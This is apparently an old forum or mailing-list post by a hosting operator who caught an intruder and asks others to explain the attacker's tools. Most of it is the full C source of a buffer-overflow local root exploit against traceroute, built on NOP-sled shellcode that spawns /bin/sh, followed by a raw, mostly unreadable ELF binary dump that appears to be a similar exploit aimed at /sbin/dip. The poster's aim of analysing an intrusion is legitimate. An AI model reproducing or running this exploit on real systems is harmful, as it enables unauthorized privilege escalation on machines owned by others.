Hello,
Well I busted somebody trying to hack my webserver that we do hosting on.
Since I'm not an expert at decoding some of this stuff, I thought I would
post the hacks here, hoping that somebody could shed some light on it. Oh,
by the way, I caught this guy because he was careless and didn't delete the
.bash_history file.
Here is the source code for the c.c hack and I've attached another program
called a.out (not sure what that program does) Any comments are greatly
appreciated, David
/*
gcc -o trace_shell trace_shell.c
*/
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 1019
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
printf("Now run: /usr/sbin/traceroute $RET\n");
system("/bin/bash");
}
ELF��������������������<��4���@
������4�
���(���������4���4��4�����������������������Ԁ��Ԁ�����������������������������������������������������������������������������<���<��<����������������/lib/ld-linux.so.2��������������������������
�������������������������������
�����������������������
��������������������������������������������������������������������
���������������������������������������������������
�������<��������#������������9�����1�������?���`��h�������E���܄����������W����������"���\������������a�����>�������h�����'�������o�����{�������v�����`�������|���
�������������,������"������̘������
������̄������"������̘�������������̘������ ������<��������
����|�����������̘�����������̘�����������И���������__gmon_start__�libc.so.6�_DYNAMIC�_GLOBAL_OFFSET_TABLE_�_fini�_init�__libc_init_first�open�exit�atexit�strcpy�perror�execl�strlen�close�_environ�write�__environ�environ�ld-linux.so.2�_start�_etext�_edata�__bss_start�_end���8������̘����������
����������������������� ������$��� ��(������,���
��0������4������������������US����[���4����t�{���]]5���%�
������%���h����%���h����%���h����%���h����% ��h
���%$��h(���%(��h0���%,��h8���p%0��h@���`%4��hH���P1t�RX^D�̘��PPRVh��|XB���PUS���=����t��Ѓ�;�u]Ív�UÐUÐU
�
���Sh���P�@Dž�������~�#v�����АDž������~��v����֍v�Dž����h���9r�(����
����
h���hA���h��O�
�}�h���j��������P�PP�
P��j�h��h��h��m�ÐUS��=��t��Ѓ;u]Ív�UÐ����US����[{���]]chatkey
�temp.dip�dip�/sbin/dip�����$^�^�3҉V�V��V4�5�V4�N�̀3@̀/bin/sh����������<����������������҄������������"��2���������������������
����`��
������������������������
���������������������������������P�������������������������������������������������GCC:
(GNU) 2.7.2.3��GCC: (GNU) 2.7.2.3��GCC: (GNU) 2.7.2.3��GCC: (GNU) 2.7.2.3��GCC: (GNU)
2.7.2.3�������������01.01���������������01.01���������������01.01���������������01.01���������������01.01����.symtab�.strtab�.shstrtab�.interp�.hash�.dynsym�.dynstr�.rel.got�.rel.bss�.rel.plt�.init�.plt�.text�.fini�.rodata�.data�.ctors�.dtors�.got�.dynamic�.bss�.comment�.note��������������������������������������������������������Ԁ�������������������������#�����������������������������������)�����������������������������������1�������������������������������������9���
��������������������������������B��� ��������������������������������K���
��������������P�������
�����������T�����������`��`���,�������������������Z�����������������������������������_�����������<��<���@�������������������e������������������������������������k����������������
�������������������s����������������8�������������������y������������������������������������������������������������������������������������������8������������������������������<��<���������������������������������̘�������������������������������������������d������������������������������d���0
��d�����������������������������������
�����������������������������������������p�������,�����������
���������������p������������������������������������������Ԁ����������������������������������������������������������������������������������������������������`����������������������
�����<��������
�����������������������������������������
������������������������������������������������<��������������̘������������������������������d�������������������������������������������������������������������������
������������
�������������������L��������
�&���L��������
�<�������������I���t��������
�T�����������
�b��������������������������������|��������
���������������������������
�o�����������
�������������������������
�T�����������
���������������������������������������
������'����������<�����������|�������������3�����
������`������������{����������̘������
������̘�������������`��h����������̄������"������<��������
�����܄��������������̘�������������������
�#��������� �
�.�����1�������4�����>�������;���̘��������B������������X���И��������]�����������
�a������������f�������������m����������"���r�����������
����,������"��������������
����initfini.c�gcc2_compiled.�crtstuff.c�__do_global_ctors_aux�__CTOR_END__�init_dummy�force_to_data�__DTOR_END__�__do_global_dtors_aux�__DTOR_LIST__�fini_dummy�__CTOR_LIST__�c.c�strcpy�_DYNAMIC�_etext�shell�execl�perror�_environ�__environ�_init�write�_start�__libc_init_first�__bss_start�main�data_start�_fini�atexit�_edata�_GLOBAL_OFFSET_TABLE_�_end�esp�exit�strlen�open�__data_start�close�__gmon_start__�
